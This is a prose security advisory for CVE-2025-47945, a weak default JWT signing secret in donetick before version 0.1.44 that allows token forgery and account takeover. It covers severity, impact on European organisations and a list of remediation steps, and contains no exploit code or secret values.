CVE-2025-47945 is a critical security vulnerability affecting donetick, an open-source task and chore management application. The flaw stems from insecure default variable initialization related to the JSON Web Token (JWT) signing secret used for authentication. Specifically, versions of donetick prior to 0.1.44 ship with a weak default signing secret for JWTs. This secret is intended to be changed by the system administrator; however, the default weak secret remains in use in many deployments, including live environments, making the vulnerability exploitable. Because JWTs are used to authenticate users, an attacker who knows or can guess the weak signing secret can forge valid tokens, thereby impersonating any user without needing credentials or user interaction. This leads to a full account takeover, compromising confidentiality and integrity of user data. The vulnerability is classified under CWE-453 (Insecure Default Initialization) and CWE-1188 (Incorrect Default Permissions), highlighting the risk of insecure default configurations. The issue was addressed in donetick version 0.1.44 by replacing the weak default secret with a secure implementation. The CVSS v3.1 score is 9.1 (critical), reflecting the vulnerability’s network attack vector, lack of required privileges or user interaction, and high impact on confidentiality and integrity. No known exploits are currently reported in the wild, but the presence of the vulnerability in live versions poses a significant risk to organizations using affected donetick versions.

For European organizations using donetick versions prior to 0.1.44, this vulnerability can lead to complete account takeover of any user within the system. This compromises sensitive task and chore data, potentially exposing personal or business-critical information. The ability to impersonate users without authentication or interaction can facilitate lateral movement, privilege escalation, or data exfiltration within organizational environments. Given donetick’s role in task management, attackers could manipulate or delete tasks, disrupt workflows, or gain footholds for further attacks. The breach of confidentiality and integrity could also lead to regulatory non-compliance under GDPR, resulting in legal and financial penalties. The lack of availability impact reduces the likelihood of denial-of-service scenarios, but the overall risk remains critical due to the ease of exploitation and broad scope of affected users. Organizations relying on donetick for operational management should consider this vulnerability a high priority for remediation to prevent unauthorized access and data compromise.

1. Immediate upgrade to donetick version 0.1.44 or later, where the weak default JWT signing secret has been replaced with a secure implementation. 2. For existing deployments, verify and rotate the JWT signing secret to a strong, randomly generated value if upgrading is not immediately feasible. 3. Audit current user accounts and access logs for signs of unauthorized access or token forgery attempts. 4. Implement monitoring and alerting for suspicious authentication activities related to JWT usage. 5. Enforce secure configuration management policies to prevent deployment of software with insecure default settings. 6. Educate system administrators on the importance of changing default secrets and credentials during installation and maintenance. 7. Consider additional layers of authentication or token validation mechanisms, such as short token lifetimes or token revocation lists, to reduce the window of exploitation. 8. Conduct penetration testing or vulnerability scanning focused on JWT authentication mechanisms to identify similar weaknesses.